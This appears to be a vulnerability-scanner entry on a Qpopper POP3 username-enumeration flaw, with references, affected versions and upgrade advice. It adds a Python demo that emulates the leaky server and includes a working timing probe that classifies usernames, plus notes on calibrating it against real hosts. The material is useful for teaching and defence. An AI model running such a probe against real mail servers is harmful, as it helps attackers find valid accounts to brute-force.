| VID | 18064 |
| Severity | 20 |
| Port | 110 |
| Protocol | TCP |
| Class | POP3 |
| Detailed Description |
The Qpopper mail server, according to its version number, is vulnerable to a valid-username disclosure vulnerability. Qualcomm Qpopper is a freely available POP3 mail server for Unix systems, distributed by Qualcomm. Qpopper 4.0.5 and earlier allow a remote attacker to enumerate valid usernames because the server's behaviour during authentication differs depending on whether the supplied username exists. If a client logs in with a valid username and an invalid password, the server waits approximately 10 seconds before disconnecting; if it logs in with an invalid username, the server disconnects immediately after the credentials are supplied. By timing the response to each login attempt, a remote attacker can determine which usernames are valid and then concentrate password brute-force attempts on those accounts.
* References: http://archives.neohapsis.com/archives/bugtraq/2003-06/0141.html
* Platforms Affected: OpenPKG Project: OpenPKG 1.1, 1.2, CURRENT; Qualcomm Qpopper 3.0.2, 3.1, 4.0.4, 4.0.5 fc2, 4.0.5; Linux, Unix: any version |
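The timing oracle described above, as an added example (not qpopper code and not part of the original advisory): an emulated POP3 server that accepts any USER and, after PASS, delays only when the username exists, beside a probe that classifies candidates by how long the server takes to reject them. The account list, the `-ERR` text, and the delay (DELAY stands in for the ~10 s in the advisory) are constructed assumptions; `uniform=True` shows the fix a server should apply, a constant delay regardless of username, which leaves the probe unable to tell the two cases apart.

```python
"""Timing-based POP3 username enumeration against an emulated server.

Added example, not qpopper's code. The server reproduces the behaviour
the advisory describes: USER succeeds for any name, and the reply to
PASS is delayed only when the username exists.
"""
import socket
import threading
import time

# Constructed account list for the emulated server (assumption).
VALID_USERS = {"alice", "bob"}
# Scaled-down stand-in for the ~10 s delay described in the advisory.
DELAY = 0.4
# Anything slower than this is classified as an existing account.
THRESHOLD = DELAY / 2


def _serve_one(conn, uniform):
    """Handle one client: USER/PASS, then -ERR and disconnect.

    uniform=False reproduces the leaky behaviour; uniform=True applies the
    same delay for every username, removing the timing signal.
    """
    rfile = conn.makefile("rb")
    conn.sendall(b"+OK POP3 ready\r\n")
    user = None
    try:
        while True:
            line = rfile.readline()
            if not line:
                return
            cmd, _, arg = line.decode(errors="replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user = arg
                conn.sendall(b"+OK\r\n")  # accepted whether or not the user exists
            elif cmd == "PASS":
                if uniform or user in VALID_USERS:
                    time.sleep(DELAY)
                conn.sendall(b"-ERR authentication failed\r\n")  # constructed text
                return
            elif cmd == "QUIT":
                conn.sendall(b"+OK bye\r\n")
                return
            else:
                conn.sendall(b"-ERR unknown command\r\n")
    finally:
        rfile.close()
        conn.close()


def start_server(uniform=False):
    """Start the emulated server on an ephemeral loopback port; return (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:  # listening socket closed: stop serving
                return
            threading.Thread(target=_serve_one, args=(conn, uniform), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def time_auth(host, port, user, password="not-the-password", timeout=10.0):
    """Send USER/PASS and return seconds from sending PASS to the server's reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        rfile = s.makefile("rb")
        rfile.readline()  # banner
        s.sendall(f"USER {user}\r\n".encode())
        rfile.readline()
        t0 = time.monotonic()
        s.sendall(f"PASS {password}\r\n".encode())
        rfile.readline()  # -ERR line, or EOF if the server just disconnects
        return time.monotonic() - t0


def enumerate_users(host, port, candidates, threshold=THRESHOLD):
    """Return {username: True if the server's delay marks it as an existing account}."""
    return {u: time_auth(host, port, u) >= threshold for u in candidates}


if __name__ == "__main__":
    for uniform in (False, True):
        srv, port = start_server(uniform=uniform)
        verdict = enumerate_users("127.0.0.1", port, ["alice", "mallory", "bob"])
        print("uniform delay:" if uniform else "leaky server:", verdict)
        srv.close()
```

Against a real host the threshold would be set from a few calibration attempts with a username that cannot exist, and each probe costs the attacker a full connection, so the technique is slow but needs no credentials. The `uniform=True` run shows why the fix is a constant delay rather than a shorter one: once every rejection takes the same time, the verdict is True for every name and carries no information.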
| Recommendation |
Upgrade to the latest Qpopper version by referring to Qualcomm Qpopper FTP site at ftp://ftp.qualcomm.com/eudora/servers/unix/popper/beta/
For OpenPKG: Upgrade to the latest qpopper package, as listed in OpenPKG Security Advisory OpenPKG-SA-2003.018 at http://www.openpkg.org/security/OpenPKG-SA-2003.018-qpopper.html
For other distributions: Contact your vendor for patch or upgrade information. |
| Related URL | (CVE) |
| Related URL | 7110 (SecurityFocus) |
| Related URL | 11543 (ISS) |